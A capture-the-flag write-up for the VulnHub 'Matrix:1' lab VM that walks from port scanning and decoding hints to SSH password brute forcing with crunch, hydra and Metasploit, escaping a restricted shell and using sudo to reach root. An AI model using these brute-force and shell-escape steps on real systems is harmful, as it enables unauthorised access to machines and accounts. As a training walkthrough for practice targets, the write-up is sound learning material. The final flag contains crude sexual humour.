30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Matrix

It has been a long time since I did a boot-2-root box from vulnhub.com.
If you don’t know the site and you’re interested in learning or honing your pentesting skills, this is the right spot.
There are numerous VMs with different difficulty levels, and most of them have a theme, which can be great fun.
Before sites like hackthebox.eu existed, this was the place to be for learning the right skills.
I have chosen to do ‘Matrix:1’ (link), created by Ajay Verma.
The difficulty is rated medium and the goal is to get root and read /root/flag.txt.
As for hints…….follow your intuitions … and enumerate!
Let’s get cracking!

Enumeration

For my initial enumeration I use a tool called Red Team Kit (RTK), which has an automated recon scanner.
It does the port scanning and, based on the results, gives some suggestions for follow-up.

██████╗ ███████╗██████╗     ████████╗███████╗ █████╗ ███╗   ███╗    ██╗  ██╗██╗████████╗
██╔══██╗██╔════╝██╔══██╗    ╚══██╔══╝██╔════╝██╔══██╗████╗ ████║    ██║ ██╔╝██║╚══██╔══╝
██████╔╝█████╗  ██║  ██║       ██║   █████╗  ███████║██╔████╔██║    █████╔╝ ██║   ██║
██╔══██╗██╔══╝  ██║  ██║       ██║   ██╔══╝  ██╔══██║██║╚██╔╝██║    ██╔═██╗ ██║   ██║
██║  ██║███████╗██████╔╝       ██║   ███████╗██║  ██║██║ ╚═╝ ██║    ██║  ██╗██║   ██║
╚═╝  ╚═╝╚══════╝╚═════╝        ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝     ╚═╝    ╚═╝  ╚═╝╚═╝   ╚═╝
Created by n0w4n
[-] Do you want to save the reports? (y/n) y
[-] Give path for saving the reports (example: /root/rtk/reports/): /root/vulnhub/matrix
[-] What is the IP address of the target? 192.168.100.139
[*] Checking connection to target
[*] Connection to 192.168.100.139 established
[*] Starting a Masscan to find open ports on the target
[*] This can take some time as this is for TCP and UDP
[*] Parsing output and loading up for further analysis
[*] Starting a TCP nmap scan on the target with acquired ports to retrieve all information
[*] This can take some time
[*] There are no open UDP ports
[*] Creating report
#############################################################################################
[*] Found the following open ports and services on the target:
22	tcp	  ssh OpenSSH 7.7 (protocol 2.0)
80	tcp	  http SimpleHTTPServer 0.6 (Python 2.7.14)
31337	tcp	  http SimpleHTTPServer 0.6 (Python 2.7.14)
#############################################################################################
[*] The following recommendations can be made:
[*] SSH
    Try bruteforcing with the commands:
      1.) hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.100.139 -t 4 ssh
      2.) hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt 192.168.100.139 -t 4 ssh
      (If nothing else works - try this as a last resort)
[*] WEB
    To enumerate the directories run the command:
      1.) python3 <path to dirsearch>/dirsearch.py -u 192.168.100.139 -e php -r -f -x 400,403,404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
back to (m)ain menu or (e)xit this program?

It looks like there is a webserver listening on two ports (80 and 31337, both a Python 2.7 SimpleHTTPServer) and an SSH server on the default port.

Webserver

While starting DirSearch in the background, I open my browser to check out port 80 first.

Welcome in the Matrix!
Looking at the source code, there is a picture referenced:

<div class="service"><img src="assets/img/p0rt_31337.png"/ width="15">

A white rabbit, to be more precise.
The file name of the picture is the hint, but I already had that port from the port scan.
Port 31337 is the next port to visit with my browser.

In the source code there is another hint…..this time in the form of a base64-encoded comment:

<!--p class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=</p-->
								</div><!-- End / service -->

Let’s decode it.

root@kali:~/vulnhub/matrix# echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

It looks like a Linux shell command that echoes a string and redirects it into a file called Cypher.matrix.
The file name is the real hint: pointing my browser at http://192.168.100.139:31337/Cypher.matrix gets me a file to download.
Let’s check out what it is:

root@kali:~/vulnhub/matrix# file Cypher.matrix
Cypher.matrix: ASCII text
root@kali:~/vulnhub/matrix# cat Cypher.matrix
+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++
[->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---<
]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++
+[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- -----
-.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> -----
-.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+
+++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++
.<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++
+++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<]
>++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.-
--.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++
++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->-
----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++
+.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+
++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[->
---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----.
<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--.
--.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++
+[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+
+.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
+.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++
+++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[->
----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++<
]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++<
]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+
+++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++<
]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[->
---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++
+++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++
[->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[->
----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[-
>---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.<
+++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++
+++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-.
<++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<]
>--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[->
+++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->--
----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[-
>---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]>
+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<
]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----
.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[
->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.
<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++
+[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>
----- ---.- --.<

This can be confusing if you see it for the first time, but if you have seen it before it is quite simple.
It is an esoteric programming language called Brainfuck. Brainfuck was designed for extreme minimalism, which leads to obfuscated-looking code: a program consists of only eight distinct command characters (> < + - . , [ ]), and anything else, such as the spaces and newlines in this file, is ignored.
There are numerous online interpreters; I use https://www.splitbrain.org/_static/ook/ to run the program and capture its output.

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
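If you would rather not paste a file from a target into a third-party website, a Brainfuck interpreter is about thirty lines of Python. The following is an added example, not code from the original post or from the box: it ignores the space and newline padding used in Cypher.matrix, uses 8-bit wrapping cells and refuses unbalanced brackets instead of silently misbehaving. The embedded CYPHER_PREFIX is the first line of the Cypher.matrix listing above plus the "+." that opens line two, so the fragment ends on a whole character; HELLO_WORLD is the well-known Hello World program as a second known-good check.

```python
import sys

# The first line of Cypher.matrix from this post, plus the "+." that starts
# line two, so the fragment ends on a whole character. Running it prints
# the "You" that opens the decoded message.
CYPHER_PREFIX = (
    "+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++\n"
    "+."
)

# The classic Hello World program (constructed sample, not from the box).
HELLO_WORLD = (
    "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
    ">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."
)

COMMANDS = "<>+-.,[]"


def run_bf(src: str, stdin: bytes = b"", cells: int = 30000) -> str:
    """Execute Brainfuck source and return everything it printed.

    Any character outside the eight commands is dropped, cells are 8-bit and
    wrap, ',' reads from `stdin` and yields 0 at EOF, and output bytes are
    returned as latin-1 text so no byte value can fail to decode.
    """
    code = [c for c in src if c in COMMANDS]

    # Pre-compute the matching bracket for every '[' and ']' so loops are
    # O(1) jumps and unbalanced programs are rejected before running.
    jump = {}
    stack = []
    for pos, cmd in enumerate(code):
        if cmd == "[":
            stack.append(pos)
        elif cmd == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at command {pos}")
            start = stack.pop()
            jump[start] = pos
            jump[pos] = start
    if stack:
        raise ValueError(f"unmatched '[' at command {stack[-1]}")

    tape = bytearray(cells)
    ptr = 0
    pc = 0
    inp = iter(stdin)
    out = bytearray()

    while pc < len(code):
        cmd = code[pc]
        if cmd == ">":
            ptr += 1
            if ptr >= cells:
                raise IndexError("tape pointer ran off the right end")
        elif cmd == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif cmd == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif cmd == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif cmd == ".":
            out.append(tape[ptr])
        elif cmd == ",":
            tape[ptr] = next(inp, 0)
        elif cmd == "[" and tape[ptr] == 0:
            pc = jump[pc]          # skip the loop body
        elif cmd == "]" and tape[ptr] != 0:
            pc = jump[pc]          # back to the matching '['
        pc += 1

    return out.decode("latin-1")


if __name__ == "__main__":
    # Usage: python bf.py Cypher.matrix   (falls back to the Hello World sample)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="latin-1") as fh:
            source = fh.read()
    else:
        source = HELLO_WORLD
    print(run_bf(source), end="")
```

Feeding the downloaded Cypher.matrix to this script reproduces the message quoted above; the prefix alone stops after "You".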

Nice…..but there is a catch. I need to figure out the last two characters to get it to work.
I could brute force them, but I prefer to keep brute forcing as a last resort.
Kali ships with a number of password lists, so maybe the full password is inside one of them.

root@kali:/usr/share/wordlists# grep -r . -e "k1ll0r*"
./rockyou.txt:k1ll0watt
./rockyou.txt:k1ll0187
./seclists/Passwords/Leaked-Databases/md5decryptor.uk.txt:k1ll0rd1e

Not really what I’m looking for: only k1ll0rd1e starts with k1ll0r, and it has three characters after the r instead of two.
Let’s just try it anyway and, if that fails, brute force the missing characters.

root@kali:/usr/share/wordlists# ssh guest@192.168.100.139
The authenticity of host '192.168.100.139 (192.168.100.139)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.100.139' (ECDSA) to the list of known hosts.
guest@192.168.100.139's password:
Permission denied, please try again.

Nope…..let’s turn to crunch.

SSH

Crunch is a tool to create wordlists. It is quite handy and easy to use.
Because I already have the fixed part of the password and know I’m missing exactly two characters, I can use a pattern (-t): % stands for a digit and @ for a lowercase letter, which gives 10 x 26 = 260 candidates of length 8:

root@kali:~/vulnhub/matrix# crunch 8 8 -t k1ll0r%@ -o passlist.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
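The same candidate list can be produced without crunch, which is handy on a box where crunch is not installed or when you want to sanity-check the size of the search space before hammering a service. The following is an added example, not code from the original post or from crunch itself: it expands crunch’s -t placeholders (@ lowercase, , uppercase, % digit, ^ symbol) with the rightmost placeholder varying fastest, the order visible in the Metasploit output further down. The symbol set behind ^ is my assumption, not copied from crunch.

```python
import itertools
import string
import sys
from typing import List

# crunch -t placeholders. The symbol set for '^' is an assumption made for
# this example; check crunch's own charset if you depend on it.
PLACEHOLDERS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/",
}


def expand_pattern(pattern: str) -> List[str]:
    """Return every candidate matching `pattern`.

    Literal characters are kept as-is; placeholders expand to their class.
    itertools.product varies the last slot fastest, so "k1ll0r%@" yields
    k1ll0r0a, k1ll0r0b, ..., k1ll0r0z, k1ll0r1a, ... k1ll0r9z.
    """
    slots = [PLACEHOLDERS.get(ch, ch) for ch in pattern]
    return ["".join(combo) for combo in itertools.product(*slots)]


def search_space(pattern: str) -> int:
    """Number of candidates the pattern produces, without building them."""
    size = 1
    for ch in pattern:
        size *= len(PLACEHOLDERS.get(ch, ch))
    return size


def write_wordlist(pattern: str, path: str) -> int:
    """Write one candidate per line (crunch's format) and return the count."""
    words = expand_pattern(pattern)
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    # Usage: python gen.py 'k1ll0r%@' passlist.txt
    pat = sys.argv[1] if len(sys.argv) > 1 else "k1ll0r%@"
    out = sys.argv[2] if len(sys.argv) > 2 else "passlist.txt"
    print(f"{search_space(pat)} candidates for {pat}")
    print(f"wrote {write_wordlist(pat, out)} lines to {out}")
```

For the pattern above this writes 260 lines of 8 characters plus a newline, the 2340 bytes crunch reported; knowing the count up front is what makes a password-guessing run against SSH defensible rather than a blind spray.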

There are different ways to use the list to brute force SSH (RTK suggested hydra above). I go for the ssh_login scanner from Metasploit, with the username set to guest and passlist.txt as the password file.

[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7i'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7j'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7k'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7l'
[-] 192.168.100.139:22 - Failed: 'guest:k1ll0r7m'
[+] 192.168.100.139:22 - Success: 'guest:k1ll0r7n' 'uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare) Linux porteus 4.16.3-porteus #1 SMP PREEMPT Sat Apr 21 12:42:52 Local time zone must be set-- x86_64 Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz GenuineIntel GNU/Linux '
[*] Command shell session 1 opened (192.168.100.137:44711 -> 192.168.100.139:22) at 2019-02-13 21:32:26 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) >

That one worked.

root@kali:/usr/share/wordlists# ssh guest@192.168.100.139
guest@192.168.100.139's password:
Last login: Mon Aug  6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$

I’m in…now to do some recon on the system.

guest@porteus:~$ id
-rbash: id: command not found

Dang…..looks like I landed in a restricted bash shell (rbash).
To get out of this restricted shell I need to know what I have to work with.

guest@porteus:~$ echo $PATH
/home/guest/prog
guest@porteus:~$ echo $SHELL
/bin/rbash

To find out what commands I can use, I press Tab twice:

guest@porteus:~$
!          ]]         builtin    compgen    declare    echo       eval       fc         getopts    in         ll         mc         pwd        select     suspend    trap       umask      wait
./         alias      caller     complete   dirs       elif       exec       fg         hash       jobs       local      mcedit     read       set        test       true       unalias    while
:          bg         case       compopt    disown     else       exit       fi         help       kill       logout     popd       readarray  shift      then       type       unset      {
[          bind       cd         continue   do         enable     export     for        history    la         ls         printf     readonly   shopt      time       typeset    until      }
[[         break      command    coproc     done       esac       false      function   if         let        mapfile    pushd      return     source     times      ulimit     vi

Almost everything in that listing is a bash builtin or keyword; the only external commands are ls, la, ll, mc, mcedit and vi, so what is reachable is governed mostly by the PATH of /home/guest/prog that the login profile sets. I can try and find the thing I need to break free……..or I can hit up msfconsole again and run the ssh scanner a second time. The session Metasploit opens does not go through the same interactive login as my ssh client, which is presumably why the restricted environment never kicks in there.

[*] Command shell session 1 opened (192.168.100.137:32967 -> 192.168.100.139:22) at 2019-02-13 21:47:17 +0100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > sessions
Active sessions
===============
  Id  Name  Type         Information                              Connection
  --  ----  ----         -----------                              ----------
  1         shell linux  SSH guest:k1ll0r7n (192.168.100.139:22)  192.168.100.137:32967 -> 192.168.100.139:22 (192.168.100.139)
msf5 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1...
id
uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare)

As you can see, the restricted shell is no bother in this session.
Now to get a proper TTY shell:

python -c 'import pty;pty.spawn("/bin/bash");'
guest@porteus:~$ id
id
uid=1000(guest) gid=100(users) groups=100(users),7(lp),11(floppy),17(audio),18(video),19(cdrom),83(plugdev),84(power),86(netdev),93(scanner),997(sambashare)

Much better.

guest@porteus:~$ sudo -l
sudo -l
User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp

Ok….so normally I would check out the (root) and the (trinity) NOPASSWD entries, which look like the intended path.
But in this case the first line says I can run everything as root with sudo; the only string attached is that it asks for guest’s password, which I already have.

guest@porteus:~$ sudo ls -lah /root
sudo ls -lah /root
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
Password: k1ll0r7n
total 74K
drwx------ 16 root root 4.0K Aug 14  2018 .
drwxr-xr-x 51 root root 4.0K Aug  6  2018 ..
-rw-------  1 root root   52 Aug 14  2018 .Xauthority
-rw-------  1 root root 6.1K Aug 14  2018 .bash_history
-rw-r--r--  1 root root   79 Mar  5  2017 .bash_profile
-rw-r--r--  1 root root 1.2K Apr 22  2018 .bashrc
drwx------  5 root root 4.0K Aug  6  2018 .cache
drwxr-xr-x 21 root root 4.0K Aug 13  2018 .config
drwx------  3 root root 4.0K Aug  6  2018 .dbus
-rw-------  1 root root   16 Aug  6  2018 .esd_auth
drwx------  4 root root 4.0K Aug  6  2018 .thumbnails
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Desktop
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Documents
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Downloads
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Music
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Pictures
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Public
drwxr-xr-x  2 root root 4.0K Aug  6  2018 Videos
-rw-r--r--  1 root root  691 Aug 14  2018 flag.txt
guest@porteus:~$ sudo cat /root/flag.txt
sudo cat /root/flag.txt
   _,-.
,-'  _|                  EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._              INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_.           IN THE MATRIX AND BEAT OFF
|`-._`-.\,-'_|  _,-'.
     `-.|.-' | |`.-'|_     WHAT
        |      |_|,-'_`.
              |-._,-'  |     NO, ME NEITHER
         jrei | |    _,'
              '-|_,-'          IT'S JUST A HYPOTHETICAL QUESTION
guest@porteus:~$

And there you have it. I don’t know if this was the way the creator intended, but hey!….whatever gets it to work.
